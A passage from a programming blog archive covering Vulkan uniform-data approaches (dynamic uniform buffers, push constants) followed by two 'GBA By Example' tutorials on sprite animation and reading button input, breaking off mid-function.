In the above code, I don’t need to call vkflushmappedmemoryranges or similar because the buffer memory was allocated with the VK_MEMORY_PROPERTY_HOST_COHERENT_BIT flag set. Without that, you’d have to manually tell vulkan when you changed the data at that pointer. Host coherent memory is very likely slower than not the alternative, but for buffers which are completely changed every frame, I’m not sure there’s much of a difference.

I haven’t tested out anything using non-host coherent memory though, so I reserve the right to be totally wrong about that.

Single Dynamic Uniform Buffer

The second approach I tried was to allocate a single VkBuffer which was large enough to store the uniform data for every object inside it, treating the buffer’s contents as an array of uniform data. Since in my case, I was submitting an array of mesh ids alongside the uniform data, this meant that I didn’t need to store any extra info in the primitive instance struct. As long as both arrays were in the same order, the right mesh would get drawn with the right uniform data.

struct PrimitiveInstance
{
    vec3 pos;
    vec3 scale;
    vec4 col;
    int meshID;
};

One caveat to this approach is that the data stored in the VkBuffer has to be memory aligned to your GPU. In my case, I was already getting my VkPhysicalDeviceProperties when I initialized everything, so that data was easily accessible. With that alignment data, you can then figure out exactly how big your VkBuffer has to be:

size_t deviceAlignment = deviceProps.limits.minUniformBufferOffsetAlignment;
size_t uniformBufferSize = sizeof(PrimitiveUniformObject);
size_t dynamicAlignment = (uniformBufferSize / deviceAlignment) * deviceAlignment + ((uniformBufferSize % deviceAlignment) > 0 ? deviceAlignment : 0);

size_t bufferSize = uniformBufferSize * primitiveCount * dynamicAlignment;

Once you know the alignment you need, you can use Windows’ aligned_malloc function to actually get an aligned block of memory, which you can then memcpy into the vkbuffer’s mapped pointer.

uniformData = (PrimitiveUniformObject*)_aligned_malloc(bufferSize, dynamicAlignment);

Since the PrimitiveUniformObject struct itself has no notion of alignment, you have to space your writes into buffer memory accordingly:

//abbreviated code

int idx = 0;
char* uniformChar = (char*)uniformData;

for (const auto& prim : primitives)
{
    PrimitiveUniformObject puo;
    puo.model = VIEW_PROJECTION * (glm::translate(prim.pos) * glm::scale(prim.scale));
    puo.color = prim.col;

    memcpy(&uniformChar[idx * dynamicAlignment], &puo, sizeof(PrimitiveUniformObject));
    idx++;
}

Likewise, when you allocate your VkBuffer, you’re going to want to request a buffer of size dynamicAlignment * number of primitives, and you’ll want to make sure you get memory that comes from a descriptorPool of type VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC.

With all of that set up, you can then copy your frame data to the uniform buffer like so:

void* udata = nullptr;
vkMapMemory(device, buffer.deviceMemory, 0, dynamicAlignment * PRIM_COUNT, 0, &udata);
memcpy(udata, uniformData,  dynamicAlignment * PRIM_COUNT);
vkUnmapMemory(device, buffer.deviceMemory);

And finally, you need to pass an offset in your calls to vkCmdBindDescriptorSets. This offset tells vulkan where in the single buffer’s data to grab each object’s individual uniform data. Since it’s a byte offset, you’ll need to have the dynamicAlignment value we calculated earlier handy:

for (int i = 0; i < PRIM_COUNT; ++i)
{
    uint32_t dynamicOffset = i * static_cast<uint32_t>(dynamicAlignment);
    vkCmdBindDescriptorSets(commandBuffer,
                            VK_PIPELINE_BIND_POINT_GRAPHICS,
                            pipelineLayout,
                            0,
                            1,
                            &descriptorSet,
                            1,
                            &dynamicOffset);

    // rest of per object draw code goes here
}

That should be enough to get you going, but we can make this faster too.

Always Mapped Single Buffer

Just like the multi-buffer approach, we can speed up the single buffer solution by keeping that buffer always mapped. Since we only have one buffer, this is a trivial change to the code. If you wanted, you could even just do it inside your update function like this:

static void* udata = nullptr;

if (!udata)
{
    vkMapMemory(device, buffer.deviceMemory, 0, dynamicAlignment * PRIM_COUNT, 0, &udata);
}
memcpy(udata, uniformData,  dynamicAlignment * PRIM_COUNT);

Of course, you probably shouldn’t do it like this, but there’s no performance reason not to, so I’m going to back away slowly from discussing code quality issues now.

Push Constants

To finish things off, let’s take a look at our big winner from the performance tests. Push constants are great for data that updates this frequently because you don’t actually need to allocate any buffers for it. This also means that we need to do a few things differently from the previous 4 approaches we’ve looked at, like changing how we declare our uniform data struct in glsl:

layout(push_constant) uniform PER_OBJECT
{
    mat4 mvp;
    vec4 col;
} obj;

Next, instead of creating any VkBuffers, when we create our pipeline layout, we need to specify a push constant range:

VkPushConstantRange pushConstantRange = {};
pushConstantRange.offset = 0;
pushConstantRange.size = sizeof(PrimitiveUniformObject);
pushConstantRange.stageFlags = VK_SHADER_STAGE_VERTEX_BIT;

VkPipelineLayoutCreateInfo pipelineLayoutInfo = {};
//..other init code here
pipelineLayoutInfo.pSetLayouts = &descriptorSetLayout; // still need this
pipelineLayoutInfo.pushConstantRangeCount = 1;
pipelineLayoutInfo.pPushConstantRanges = &pushConstantRange;

Like the comment above says, even when using push constants, you still need to provide a descriptorSetLayout to specify how the uniform data is going to be laid out in memory. You just don’t actually need to make any descriptorSets to actually pass that data to the shader.

Instead, where you might otherwise call vkCmdBindDescriptorSets, you do the following:

for (int i = 0; i < PRIM_COUNT); ++i)
{
vkCmdPushConstants(
    commandBuffer,
    pipelineLayout,
    VK_SHADER_STAGE_VERTEX_BIT,
    0,
    sizeof(PrimitiveUniformObject),
    &uniformData[i]);

    // rest of per object draw code goes here

}

That should cover it (assuming I haven’t missed a step). Given the option, push constants feel a lot cleaner for passing small bits of data to shaders, which makes sense given that they’re tailor made for that purpose. It is nice to have the most performant option we have, also be the easiest to work with.

Conclusion

That wraps up the implementation details for everything. To get a sense of when to use each approach, I recommend you check out NVidia’s Vulkan Shader Resource Binding page.

I’m a complete beginner with Vulkan, so if you see anything weird or just plain wrong in this post, please send me a message on Twitter, I would love to hear from you! Likewise, if there’s a resource out there that’s helped you get a handle on Vulkan, please pass it along.

Until next time!

Appendix: Testing Methodology
In case reviewing testing methods is your thing, here's how I got the numbers in all the graphs in this post:

All the source for everything is on github, I would love for someone to compile everything and run a similar test to see if the results for my GPU can be replicated on someone else's hardware.

GBA By Example - Sprite Animation

2017-06-02T00:00:00+00:00

(Note: This is Part 5 of my GBA by Example series. A list of my other GBA tutorials can be found here)

Whew, it’s been awhile! I know I said I’d put up another tutorial in 2 weeks…but that didn’t happen. Between shipping a game at work, and diving into Vulkan, my interest for GBA stuff definitely took a back seat. Lesson learned, don’t put a deadline on blog posts :)

So far, I’ve gotten by with doing the bare minimum for anything art related, but our end products have never been too exciting. So this article is going to fix that. First, we’re going to walk through the process of grabbing some (public domain) sprites off of OpenGameArt.org, importing those into our game, and then using them to animate a character as we move them around the screen.

At the end of the article, we should have something that looks like this:

Wooooo! Finally something that kinda looks like a game! Let’s get this train rolling.

Getting Our Assets

All the character sprites we’re working with today come from this asset on OpenGameArt, I chose these sprites not only because they had a sane palette and sprite size (which is hard to find, since not a lot of people are making assets with the GBA’s limitations), but also because they’re public domain, so I can use them in this article without the chance of getting sued. woohoo!

It also means you can use these sprites in your own projects (even commercial projects), which is also pretty cool.

I took the liberty of extracting only the character sprites we’re going to use today into their own spritesheet, which you can grab below:

This should save us having to do any pixel editing for this blog post, but we will have to export these sprites into a useable format for our game. To do that, we’re going to use a nifty open source tool called Grit. I mentioned this tool in a previous post, but today I’m going to walk through using it as well. If you don’t have that downloaded already, grab it now and let’s get started.

Exporting Sprite Data

Grit is a tool for taking bitmap images, and exporting them into .h/.c files (among other potential types of files), for consumption by a GBA game. We need to export each of our character sprites using it, and then manually load that data in our program like we’ve been doing before.

I’m going to use the GUI version of grit, which you can find in the program folder, titled “wingrit.” There’s a command line app as well, but I haven’t needed to use it yet (and if I can avoid memorizing more command line args, I will), so if you’re following along with me, open wingrit, and you should see the following:

Simply open our sprite sheet image (with File->Open), and you should see it in the GUI window. Once you see the image, we need to open the export window, so go to View->GBAExport, and you should see this rather intimidating window pop up:

Like the window itself says, don’t panic :) there’s only a few things we need to do. First, we need to make sure that we’ve set the exported to 8 bits per pixel, you’ll find that option in the top right of the window. Next, tell it to export .h/.c files, so in the “File” section, set the type to “C (*.c),” you’ll also want to set where the exported files should go in the larget text field above the type dropdown. Finally, we need to set the size of our sprite, which, for all of our sprites here, means setting the “Meta/Obj” section to square, size 2, which corresponds to 16x16 pixel sprites.

Finally, I always export the data as unsigned integers. Whenever I use a smaller data type I end up running into weirdness with memcpy at some point. Since we aren’t going to be modifying the raw data anyway, the fact that storing all the data as 32 bit integers makes it harder for humans to read is a non issue. So set your export type to “u32”

Once all that is set up, click ok, and you should see a success popup.

One of the coolest parts about grit is its ability to export multiple sprites from a sprite sheet. Since we told Grit that our sprites were 16x16 pixels in size, it was smart enough to be able to parse the sprite sheet correctly and give us .h/.c files with the data in a nicely useable format. So don’t worry about needing to run grit for each individual sprite, it’s already done all the work for us.

Importing Sprite Data

Now that we have our sprite data exported, we need to get it into VRAM. This should look familiar if you’ve been following along with previous articles. All we need to do is a few memcpys and we’re good to go:

#include "charsprites.h"
#include <string.h>
#include "gba.h"

int main()
{
    memcpy(&MEM_TILE[4][0], charspritesTiles, charspritesTilesLen);
    memcpy(MEM_PALETTE, charspritesPal, charspritesPalLen);

}

One thing that is different this week is that I’ve moved all the memory address defines, and typedefs that we need to use to an include file called gba.h . This is mostly for my sanity, and to keep my code samples cleaner. You can grab this include file here. Everything that is in this include has been shown explicitly in a previous post I’ve made, so don’t worry about parsing through it, unless you see something in a code sample that you don’t remember.

Ok, now that we have our data into video memory, we also need to set up our application’s Display Control register so it knows how to interpret it:

REG_DISPLAYCONTROL =  VIDEOMODE_0 | BACKGROUND_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;

This should look identical to the last time we used sprites, because it is ;) but as a refresher:

VIDEOMODE_0 is a tiled video mode, meaning that we’re using sprites instead of drawing directly to the screen buffer
BACKGROUND_0 enables the 0th background. I’m going to use this to colour the background of our game
ENABLE_OBJECTS is the flag that tells our program to use sprites
MAPPINGMODE_1D means that our sprites are stored in a 1 Dimensional array. Grit takes care of this for us.

Wonderful! To finish off our setup, let’s add our game loop. Remember that returning from a GBA program’s main function is undefined, so our game loop needs to never terminate. For now, let’s also add a call to our hacky little vsync function in the main loop. This function is defined in gba.h, but is the same as every other post I’ve made.

Put together, our starting point looks like this:

#include "charsprites.h"
#include <string.h>
#include "gba.h"
int main()
{

    memcpy(&MEM_TILE[4][0], charspritesTiles, charspritesTilesLen);
    memcpy(MEM_PALETTE, charspritesPal, charspritesPalLen);

    REG_DISPLAYCONTROL =  VIDEOMODE_0 | BACKGROUND_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;

    while(1)
    {
        vsync();
    }

    return 0;
}

Perfect! No we’re ready to get down to the fun stuff!

Getting our Character On Screen

I always like to work in small, easily verifiable steps when I’m learning something new. So before we dig really far into animating our character, let’s just get our hero on screen. We covered this in an earlier post, but today I want to do things a bit differently. Since we’re animating our character today, we should probably talk about double buffering object memory.

Since the GBA hardware draws the screen 1 line at a time, it’s possible to modify the object memory for a sprite while it’s being drawn. In some cases this will just mean a bit of tearing (if the sprite is moving), but in the case of animation, it could lead to the top of the sprite being rendered in a different animation frame from the bottom part. Gross! This isn’t really an issue for us today because we aren’t doing enough work for us to leave the VBLANK pause, but it’s worth noting so that we learn to do things right before from the get go.

In order to avoid this potential problem, one thing we can do is to create a second buffer of memory, which shadows object memory. Whenever we want to update something about a sprite in our game logic, we modify the data inside our own copy of object memory. Then when we hit the VBlank pause, we copy all the data from our shadow buffer to real object memory. This lets us do whatever we want in our logic, while keeping our sprites looking exactly how they should.

We could define our object-memory shadow buffer like so:

ObjectAttributes oam_object_backbuffer[128];

Remember that the definition of the ObjectAttributes struct is inside gba.h if you forget what that looks like.

Now we should also add the code to copy data from our backbuffer to the real Object Attribute Memory. For now, I’m just going to copy the first element, because that’s all we need for today. In a real application, you’d probably want to copy the whole thing, or at least larger chunks at a time.

while(1)
{
    vsync();
    MEM_OAM[0] = oam_object_backbuffer[0];
}

Now that that’s set up, let’s actually copy something useful into VRAM.

ObjectAttributes *spriteAttribs = &oam_object_backbuffer[0];
spriteAttribs->attr0 = 0x2000;
spriteAttribs->attr1 = 0x4000;
spriteAttribs->attr2 = 0;

Which means that, when everything is put together, your main function should look like this:

int main()
{

    memcpy(&MEM_TILE[4][0], charspritesTiles, charspritesTilesLen);
    memcpy(MEM_PALETTE, charspritesPal, charspritesPalLen);

    REG_DISPLAYCONTROL =  VIDEOMODE_0 | BACKGROUND_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;

    ObjectAttributes *spriteAttribs = &oam_object_backbuffer[0];
    spriteAttribs->attr0 = 0x2000;
    spriteAttribs->attr1 = 0x4000;
    spriteAttribs->attr2 = 0;

    while(1)
    {
        vsync();
        MEM_OAM[0] = oam_object_backbuffer[0];
    }

    return 0;
}

With the sprite defined like we have, running the program should yield this:

Perfect! Now we know our data is in memory correctly! Next let’s get some animations going.

Hello Sprite Animation

Before we dig into making our hero run and jump, let’s just get his idle animation cycle running to be sure that things are working how we expect. In the sprite sheet that I provided earlier, the animation cycle is located in the first 4 frames. We want to have our hero cycle through these frames whenever he isn’t moving.

Setting this up a single animation like this is really simple, because all we need to do is point attr2 in our sprite attributes to a new place in tile memory. You’ll notice that right now, our sprite is simply stuck on the first frame of his idle animation. This is because we put the sprites into tile memory at the start of the tile block, so the index of the first frame is 0. It stands to reason that updating this should just be a simple add…

spriteAttribs->attr2 = (spriteAttribs->attr2 + 1) % 3;

buuut it isn’t! Remember that attr2 is the index of the tile to use to render the top left most part of your sprite. Since our sprite is 2 tiles by 2 tiles, this means that in theory, to advance a whole frame, our attr2 value must increment by 4. In reality, since we are using 8bpp tiles, we have to double that, so advancing a frame of animation means advancing attr2 by 8. With that in mind, running our idle loop actually requires the following:

spriteAttribs->attr2 = (spriteAttribs->attr2 + 8) % 32;

With that bit of code added to the update loop, our protagonist should now be happily bouncing in place:

Alright, with that in mind, let’s move on to actually hooking up some input and getting this guy moving around the screen.

Setting Up Input

Just like last time, all our input handling code is stored in input.h, so make sure that you add that to your includes. Once that’s included, just make sure to add a call to key_poll in your main function, otherwise we’ll never know when the input state changes. If you’re following along, your main function should look like this:

while(1)
{
    vsync();
    key_poll();

    spriteAttribs->attr2 = (spriteAttribs->attr2 + 8) % 32;

    MEM_OAM[0] = oam_object_backbuffer[0];
}

Before we get to actually writing our movement and animation functions there, there’s one last bit of theory to get out of the way: there are some new bits in the object attributes attr1 variable that we’re going to need today.

More Details About Object Attributes

When I last talked about sprites, I presented 3 tables describing which bits in the sprite attribute values corresponded to what. In the interest of simplicity, I left out a lot of details. In this post, we need to fill in one of those details, so here is a more complete description of what attribute 1 does:

Attr 1	0x FEDC BA98 7654 3210
FE	Sprite Size (discussed below)
D	Vertical Flip
C	Horizontal Flip
BA98	Not Used Today
7654 3210	X coordinate

Yes, there’s still some data we don’t need to worry about, but the stuff to pay attention to here are the bit flags for vertical and horizontal flipping. You may have noticed that our sprites only have our protagonist facing one way, the horizontal flip flag is how we’re going to handle the other direction.

Moving Our Hero

Let’s tackle moving our hero around the screen next, and finish off with adding support for the rest of our animation frames. To make things easier (and more readable), I’m going to define a struct to hold all the information we need to move and animate our hero. For simplicity’s sake, I’m just going to make all the fields we need ints.

Here’s what my struct and it’s initialization code look like:

const int FLOOR_Y = 160-16;

typedef struct
{
    ObjectAttributes* spriteAttribs;
    int facingRight;
    int firstAnimCycleFrame;
    int animFrame;
    int posX;
    int posY;
    int velX;
    int velY;
    int framesInAir;
}HeroSprite;

void InitializeHeroSprite(HeroSprite* sprite, ObjectAttributes* attribs)
{
    sprite->spriteAttribs = attribs;
    sprite->facingRight = 1;
    sprite->firstAnimCycleFrame = 0;
    sprite->animFrame = 0;
    sprite->posX = 0;
    sprite->posY = FLOOR_Y;
    sprite->velX = 0;
    sprite->velY = 0;
    sprite->framesInAir = 0;
}

Nothing too fancy here. Notice though, that I also defined a constant for the location of the “floor” which is actually 16 pixels above the floor. This is because our hero is 16 pixels tall and when you set a sprite’s position, you set it’s top left corner; thus, I’ve defined the floor Y as the location of the top of our hero’s head when he’s on the floor for simplicity.

To handle character movement, I’m going to create another function called updateSpritePosition.

void updateSpritePosition(HeroSprite* sprite);

This function is going to first determine our hero’s velocity for the current frame, and then add those velocities to his position. It will also set up a few other bits of data that we’ll use later when determining what animation frame to display, and actually translate these struct member vars into actual values inside object attribute memory. To start with though, let’s just start dealing with user input from the DPAD:

const int WALK_SPEED = 4;

void updateSpritePosition(HeroSprite* sprite)
{
    if (getKeyState(KEY_LEFT))
    {
        sprite->facingRight = 0;
        sprite->velX = -ANIM_SPEED;
    }
    else if (getKeyState(KEY_RIGHT))
    {
        sprite->facingRight = 1;
        sprite->velX = ANIM_SPEED;
    }
    else sprite->velX = 0;

    sprite->posX += sprite->velX;
    sprite->posX = min(240-16, sprite->posX);
    sprite->posX = max(0, sprite->posX);

This should all be pretty straightforward. The only bit you may be wondering about is the facingRight flag. We’re going to use this later to handle horizontally flipping our sprites so that we can use one set of sprites but have our hero be able to look and move both left and right. Also note that I’m clamping the x position to keep our sprite on the screen at all times.

Next, we need to add support for jumping. Note that if we’re already in the air, we don’t want to jump again, so we’re going to have to take that into account:

void updateSpritePosition(HeroSprite* sprite)
{
    //previous code omitted for brevity

    int isMidAir = sprite->posY != FLOOR_Y;

    if (getKeyState(KEY_A))
    {
        if (!isMidAir)
        {
            sprite->velY = JUMP_VI;
            sprite->framesInAir = 0;
        }
    }

    if (isMidAir)
    {
        sprite->velY = JUMP_VI + (GRAVITY * sprite->framesInAir);
        sprite->velY = min(5, sprite->velY);
        sprite->framesInAir++;
    }

    sprite->posY += sprite->velY;
    sprite->posY = min(sprite->posY, FLOOR_Y);
}

Hopefully nothing here is surprising. If you haven’t implemented gravity before, you may want to check out this excellent article on Khan Academy about Kinematic equations. Since they’re not the focus of today, that’s all I’m going to say about them here. I’m using the framesInAir variable in place of an actual time calculation for now, which is why it reset whenever a new jump starts.

None of this code actually moves our sprite, so we need to finish off this function by setting a few key variables:

sprite->spriteAttribs->attr0 = 0x2000 + sprite->posY;
sprite->spriteAttribs->attr1 = (sprite->facingRight? 0x4000 : 0x5000) + sprite->posX;

As you can see, because the lowest bits in these flags store positions, it’s enough for us to just add our x and y position to the end of them. You can also see how the facingRight flag corresponds to the value we set in the horizontal flip bit that we talked about earlier.

Now we need to add a call to this function to main:

int main()
{

    memcpy(&MEM_TILE[4][0], charspritesTiles, charspritesTilesLen);
    memcpy(MEM_PALETTE, charspritesPal, charspritesPalLen);

    REG_DISPLAYCONTROL =  VIDEOMODE_0 | BACKGROUND_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;

    HeroSprite sprite;
    InitializeHeroSprite(&sprite, &oam_object_backbuffer[0]);

    while(1)
    {
        vsync();
        key_poll();        

        updateSpritePosition(&sprite);
        MEM_OAM[0] = oam_object_backbuffer[0];
    }
    return 0;
}

And with that, you should be able to move your sprite around using the dpad and A button to jump. He just won’t be animating yet:

Our Animation function

As the heading suggests, we’re going to be writing one more function today, which is going to implement our animation:

void tickSpriteAnimation(HeroSprite* sprite);

We’re going to be choosing the tile to point our attr2 variable at by setting two separate values, the firstAnimCycleFrame and animFrame values in our HeroSprite struct:

firstAnimCycleFrame will hold the index to the first frame in that animation cycle. Our idle animation cycle is 4 frames long and starts at index 0, so for the idle animation cycle, this will be set to 0
animFrame will hold the current frame of animation we are at in our animation cycle. If we want the third frame of an animation, this would be set to two (since frames are zero indexed)

Knowing that, it’s probably useful for us to take another look at our sprite sheet, and figure out where our walk, run, and jump cycles start in the seet. I’ve oultined them below:

So that puts our idle cycle starting at index 0, our run cycle at index 4, and our jump cycle at index 7. Given that we use 4 tiles per sprite, and have 8bpp tiles, this means that the real indices we need are:

Idle starts at 0
Run starts at 32
Jump starts at 56

Let’s start off by just writing the first and last line of our function:

void tickSpriteAnimation(HeroSprite* sprite)
{
    ObjectAttributes* spriteAttribs = sprite->spriteAttribs;

    //set firstAnimCycleFrame and animFrame in code here

    spriteAttribs->attr2 = sprite->firstAnimCycleFrame + (sprite->animFrame * 8);
}

This is just to give you an idea of how this function works. Note that if you were using 8bpp sprites, you would only need to multiply animFrame by 4.

Alright, here’s our first, and easiest case: jumping. We only have 2 sprites for jumping, one when we’re on the way up, and one when we’re on the way down.

int isMidAir = sprite->posY != FLOOR_Y;

//update velocity for gravity
if (isMidAir)
{
    sprite->firstAnimCycleFrame = 56;
    sprite->animFrame = sprite->velY > 0 ? 1 : 0;
}

If we aren’t in the air, the only other two options are that we’re standing still, or that we’re walking around:

else
{
    if (sprite->velX != 0)
    {
        sprite->firstAnimCycleFrame = 32;
        sprite->animFrame = (++sprite->animFrame) % 3;

    }
    else
    {
        sprite->firstAnimCycleFrame = 0;
        sprite->animFrame = (++sprite->animFrame) % 4;
    }
}

Obviously none of this code is very re-useable; we are hardcoding both the length of the anim cycles, and their start points in sprite sheets, but it works for our example.

With the above two chunk of code added to our animation function, all that’s left is to call the animation function from main:

while(1)
{
    vsync();
    key_poll();        

    updateSpritePosition(&sprite);
    tickSpriteAnimation(&sprite);
    MEM_OAM[0] = oam_object_backbuffer[0];
}

And you should (finally) be in possession of your very on animated character!

Wrapping Up

If you got stuck at any part of this, the code for the finished product can be found on github.

Finally, as always, I’m available on Twitter to answer questions, say hi, etc. I’d love to hear if you’re building something for the GBA after reading these posts :)

Have a good one!

GBA By Example - Getting User Input

2017-04-18T00:00:00+00:00

(Note: This is Part 5 of my GBA by Example series. A list of my other GBA tutorials can be found here)

We’ve covered an awful lot of drawing in these posts, but it takes a lot more than drawing code to make a game. One of the key parts of building something playable is letting users actually be able to interact with our code, so today I’m going to go over how to get user input on the GBA. It’s going to be short and sweet, because it’s really not that complicated on this platform, which is great, because it means that we can spend more time on building an example program this week.

By the end of the post today, we’re going to end up with a simple program that displays a sprite and changes the background based on what button was last pressed. It’s going to look something like this:

Initially this cleared the screen after each press so I could properly do the Konami code.
The gif was reeeaalllyy annoying though

Let’s get started :)

Detecting What Keys Are Pressed

I assume if you’re interested in these posts, you already know what a GBA looks like. Just in case, here’s a photo with all the inputs shows:

The GBA has 10 buttons that the user can press while a game is running:

A / B buttons
Start / Select Buttons
R / L Shoulder Buttons
DPAD - (Left, Right, Up, Down)

Each of these buttons can be in one of two states - down or up. Conveniently, the state of every button is stored in a single 16 bit value (with only the lower 10 bits used). This value is known as the Input Register. It, and the location of each key’s corresponding bit are as follows:

</tr>

REG_INPUT	0x FEDC BA98 7654 3210
FEDCBA	Ignored / Undefined Data
9	Left Shoulder Button
8	Right Shoulder Button
7	DPAD -> Down
6	DPAD -> Up
5	DPAD -> Left
4	DPAD -> Right
3	Start Button
2	Select Button
1	B Button
0	A Button

The only bit of weirdness with all of this is that the GBA represents keys which are in their Up (un-pressed) state with a value of 1, and keys that are pressed with a value of 0. This means that if we were to read the value of the input register while the Start button was pressed, we would expect to see a value of 0x0000 0011 1111 0111, notice that the bit that corresponds to the start button is 0, because the button is down.

Turning the above table into a set of constants representing which bit is set for each key looks lkke this:

#define REG_KEYINPUT  (* (volatile uint16*) 0x4000130)

#define KEY_A        0x0001
#define KEY_B        0x0002
#define KEY_SELECT   0x0004
#define KEY_START    0x0008
#define KEY_RIGHT    0x0010
#define KEY_LEFT     0x0020
#define KEY_UP       0x0040
#define KEY_DOWN     0x0080
#define KEY_R        0x0100
#define KEY_L        0x0200

#define KEY_MASK     0xFC00

and using the above table, a function that returns a non zero value if a key is down might look like this:

uint32 getKeyState(uint16 key_code)
{
    return !(key_code & (REG_INPUT | KEY_MASK) );
}

Because we aren’t immediately inverting the value in the input register (like Tonc does), the bitwise logic for this can be a bit unintuitive, so let’s walk through how the above function works.

For the example, let’s assume that we’re testing to see if the Start button is currently pressed:

First, We get the value from the REG_INPUT register, and OR it with a bit mask that makes sure the undefined bits in the value are set to 1 (called KEY_MASK above)

 INPUT:  ???? ??11 1111 0111
 FLAG : 1111 1100 0000 0000
 --------------------------
        1111 1111 1111 0111

Next we AND the value with the Start mask: 0x0008

 INPUT:  1111 1111 1111 0111
 START: 0000 0000 0000 1000
 --------------------------
val= 0x 0000 0000 0000 0000
return (!val); //true, key is DOWN

This gives us 0, because of how the GBA stores key states (Remember, 1 is UP), so we just return whether our result == false so that we get a non zero value when the button is down
If instead of the Start Mask, we checked a different button, like the A Button:

 INPUT: 1111 1111 1111 0111
 A BTN: 0000 0000 0000 0001
 --------------------------
val= 0x 0000 0000 0000 0001

return (!val); //false, key is UP

The KEY_MASK constant is important for this function to work, because we have no idea that the top 6 bits of this value are being set to (whatever it is, it’s junk data), and we want to be sure that we’re only testing our key_code value against data that we expect is in the input register.

Always masking the KEY_INPUT register by the KEY_MASK value seems a bit excessive to me though. What I prefer to do (and what you’ll see elsewhere on line), is to use a function that will store the value in the input register in a 16 bit variable, and perform the masking then. This function is called once per frame, and then you don’t have to worry about OR-ing with KEY_MASK every time you want to read a value from the hardware:

uint16 input_cur;

inline void key_poll()
{
    input_cur = REG_KEYINPUT | KEY_MASK;
}

uint32 getKeyState(uint16 key_code)
{
    return !(input_cur & key_code);
}

void main()
{
    while(1)
    {
        key_poll();
        if ( getKeyState(KEY_L) )
        {
            //key is down
        }
    }
}

This is great, but it only lets us test if the user is currently holding down a key, it doesn’t let us detect if the key has been just pressed. This is great for things like charging an attack, but not as good for something like triggering a jump, because it’s going to read as true for multiple frames unless your user has the reflexes of a cat.

Detecting Key Press and Key Release

The obvious next thing we need to do is to be able to detect if the user has just started pressing or releasing a button. To do this, we need to store a second input state variable, that holds the input of the previous frame. To determine if a key’s state is new, we just have to compare the current frame’s input register to the one from the previous frame. It makes sense to do this register-copying inside the function we use to store the current frame’s input:

uint16 input_cur;
uint16 input_prev;

void key_poll()
{
    input_prev = input_cur;
    input_cur = REG_KEYINPUT | KEY_MASK;
}

Then all we need are two new functions to detect key press and release:

uint16 wasKeyPressed(uint16 key_code)
{
    return (input_cur & ~input_prev) & key_code;
}

uint16 wasKeyReleased(uint16 key_code)
{
    return (~input_cur & input_prev) & key_code;
}

If you’re confused by the above, writing it out on paper really helps, but I’m going to skip walking through it here because it really only matters long enough to write the above functions.

When it’s all put together, your input handling code might look like this:

#ifndef INPUT_H
#define INPUT_H

unsigned short input_cur = 0x03FF;
unsigned short input_prev = 0x03FF;

#define REG_KEYINPUT  (* (volatile unsigned short*) 0x4000130)

#define KEY_A        0x0001
#define KEY_B        0x0002
#define KEY_SELECT   0x0004
#define KEY_START    0x0008
#define KEY_RIGHT    0x0010
#define KEY_LEFT     0x0020
#define KEY_UP       0x0040
#define KEY_DOWN     0x0080
#define KEY_R        0x0100
#define KEY_L        0x0200

#define KEY_MASK     0xFC00

inline void key_poll()
{
    input_prev = input_cur;
    input_cur = REG_KEYINPUT | KEY_MASK;
}

inline unsigned short wasKeyPressed(unsigned short key_code)
{
    return (key_code) & (~input_cur & input_prev);
}

inline unsigned short wasKeyReleased(unsigned short key_code)
{
    return  (key_code) & (input_cur & ~input_prev);
}

inline unsigned short getKeyState(unsigned short key_code)
{
    return !(key_code & (input_cur) );
}
#endif

That’s literally all there is to input handling on the GBA! You can stop here if that’s all you’re after, but I took it a step further and built the program you saw at the start of the article. I’m going to walk through how to put that together below.

But for the remainder of this post, and all future posts, I’m going to put the input handling code above into input.h

Sprite and BG Data

All the sprites that I’m using for the example project can be found on github. It isn’t super compact, but for such a simple program, that’s not really that important. If you want to follow along as I build this, grab the data from there. If you just want the final product, you can find the whole thing on github here.

The function to load the sprite data is as follows:

typedef unsigned char      uint8;
typedef unsigned short     uint16;
typedef unsigned int       uint32;

typedef uint16 ScreenBlock[1024];
typedef uint16 Tile[32];
typedef Tile TileBlock[256];

#define MEM_PALETTE             ((uint16*)(0x05000200))
#define MEM_TILE                ((TileBlock*)0x6000000)
#define MEM_OAM            ((volatile ObjectAttributes *)0x07000000)

typedef struct ObjectAttributes {
    uint16 attr0;
    uint16 attr1;
    uint16 attr2;
    uint16 pad;
} __attribute__((packed, aligned(4))) ObjectAttributes;

void LoadTileData()
{
    //each sprite is 32 tiles
    memcpy(MEM_PALETTE, Pal,  PalLen );
    memcpy(&MEM_TILE[4][0], ATiles, TileLen);
    memcpy(&MEM_TILE[4][32], BTiles, TileLen);
    memcpy(&MEM_TILE[4][64], SelectTiles, TileLen);
    memcpy(&MEM_TILE[4][96], StartTiles, TileLen);
    memcpy(&MEM_TILE[4][128], RIGHTTiles, TileLen);
    memcpy(&MEM_TILE[4][160], LEFTTiles, TileLen);
    memcpy(&MEM_TILE[4][192], UPTiles, TileLen);
    memcpy(&MEM_TILE[4][224], DOWNTiles, TileLen);
    memcpy(&MEM_TILE[5][0], LTiles, TileLen);
    memcpy(&MEM_TILE[5][32], RTiles, TileLen);

    volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];

    spriteAttribs->attr0 = 0x602F;
    spriteAttribs->attr1 = 0xC04F;
    spriteAttribs->attr2 = 0;

}

I’m not going to walk through this, because we’ve already covered how to load and set up sprites in a previous post

I’m also using a simple 1 colour background in the gif from earlier, which I just created procedurally like so:

#define MEM_BG_PALETTE          ((uint16*)(0x05000000))
#define MEM_SCREENBLOCKS        ((ScreenBlock*)0x6000000)
#define REG_BG0_CONTROL        *((volatile uint32*)(0x04000008))

void CreateBackground()
{
    MEM_BG_PALETTE[0] = RGB15(0,0,0);

    uint8 tile[64];
    for (int j = 0; j < 64; j++)
    {
        tile[j] = 0;
    }
    memcpy(MEM_TILE[0][0], tile, 64);

    uint16 screenBlock[1024];
    for (int i = 0; i < 1024; i++)
    {
        screenBlock[i] = 0;
    }

    memcpy(MEM_SCREENBLOCKS[1], &screenBlock[0], 2048);

    REG_BG0_CONTROL = 0x0180;

}

Again, I’m not going to talk too much about this, because I covered it last week.

Great! Now that that’s out of the way, let’s do something more interesting.

Drawing Sprites

The most obvious thing to do is to draw a different sprite depending on what button is currently pressed. This is pretty easy since we laid our sprites out sequentially in memory:

inline uint16 RGB15(uint32 red, uint32 green, uint32 blue)
{
    return red | (green<<5) | (blue<<10);
}

void DrawSprite(uint16 key_code)
{
